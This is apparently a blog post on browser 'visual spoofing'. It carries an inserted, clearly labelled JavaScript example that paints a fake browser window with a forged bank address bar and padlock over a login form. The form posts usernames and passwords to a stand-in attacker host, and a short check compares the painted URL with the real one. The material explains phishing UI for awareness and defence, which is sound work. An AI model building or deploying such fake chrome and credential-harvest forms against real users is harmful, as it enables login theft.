While Microsoft recently patched a URL-based spoofing vulnerability, a whole new class of spoofing exists for browsers: Visual Spoofing. I have not yet seen any evidence of this type of spoofing actually being done, but I was able to create a demo in less than an hour.
Here is the demo of visual spoofing for IE6 I put together. Note that the vulnerability is not unique to IE.
The problem with visual spoofing is that it is difficult to fix with a simple patch. Yes, there are ways to fix the problem partially, but I don't see a way to remove the problem completely, because hackers can still create a page with images of overlapping windows to distract the clueless user, who tends to keep many windows open.
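To make the mechanism concrete, here is an added example of the technique (it is not the author's IE6 demo and is not taken from the post). The page draws its own "browser window" as ordinary content: a title bar, an address bar showing a trustworthy-looking URL, a padlock, and a login form underneath. Every one of those pixels is page content, so no patch to the real chrome changes what the user sees inside the fake one. The bank hostname and attacker origin are invented for illustration; the only ground truth the page cannot forge is the real document location, which the small check at the end compares against the claimed one.

```javascript
// Added example: a minimal "picture-in-picture" visual spoof, plus the one check
// the page cannot defeat. Hostnames below are assumptions for illustration only.

const SPOOFED_URL = "https://www.example-bank.com/login"; // URL painted into the fake address bar
const ACTUAL_ORIGIN = "http://attacker.example";          // where the page really lives (assumed)

// Escape text before interpolating it into markup, so the fake chrome itself
// cannot be broken out of by the strings it displays.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Build a block of HTML that imitates a browser window. Title bar, address bar,
// padlock and status bar are all just styled divs; nothing here touches the
// real browser UI, which is exactly why the real UI cannot "fix" it.
function buildFakeWindow({ spoofedUrl, title, bodyHtml }) {
  const url = escapeHtml(spoofedUrl);
  const t = escapeHtml(title);
  return [
    '<div class="fake-window" style="position:absolute;top:40px;left:60px;width:640px;',
    'border:1px solid #888;background:#fff;font:12px sans-serif;box-shadow:4px 4px 12px #444">',
    // title bar of the fake window
    `<div style="background:#0a246a;color:#fff;padding:3px 6px">${t} - Web Browser</div>`,
    // fake address bar: the padlock and https:// URL are plain text, not a security indicator
    '<div style="background:#ece9d8;padding:3px 6px;border-bottom:1px solid #aaa">',
    `Address <span style="background:#fff;border:1px inset #888;padding:1px 4px">${url}</span>`,
    "</div>",
    // page body: a harvest form whose real destination is the attacker's origin
    `<div style="padding:12px">${bodyHtml}</div>`,
    // fake status bar with a painted padlock
    '<div style="background:#ece9d8;padding:2px 6px;border-top:1px solid #aaa">Done',
    '<span style="float:right">&#128274; Internet</span></div>',
    "</div>",
  ].join("");
}

// The check the fake chrome cannot forge: compare the origin the painted address
// bar claims against the origin of the document that actually rendered it.
// In a browser, realHref would be window.location.href.
function chromeClaimMatchesLocation(claimedUrl, realHref) {
  return new URL(claimedUrl).origin === new URL(realHref).origin;
}

const LOGIN_FORM = [
  `<form method="post" action="${ACTUAL_ORIGIN}/harvest">`,
  'User ID <input name="u"> Password <input name="p" type="password">',
  '<input type="submit" value="Sign in"></form>',
].join("");

// When loaded in a real browser, paint the fake window over the page.
if (typeof document !== "undefined") {
  document.body.insertAdjacentHTML(
    "beforeend",
    buildFakeWindow({ spoofedUrl: SPOOFED_URL, title: "Sign in", bodyHtml: LOGIN_FORM })
  );
  console.log(
    "painted URL matches real location:",
    chromeClaimMatchesLocation(SPOOFED_URL, document.location.href)
  );
}
```

Nothing in the real chrome changed; the user's only defence is to read the browser's own address bar rather than the one drawn inside the page, which is why the author's "deeper problem" is a UI problem rather than a parser bug.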
While thinking about tigers this afternoon, I stumbled onto an idea that could reduce the vulnerability, including the 'deeper problem', to an acceptable level. Why was I thinking of tigers? I have no idea. Anyhow, I'll post about it in the next day or two (look for a post titled 'Secure UI') after I explain the 'deeper problem'.
Boy, I feel better already.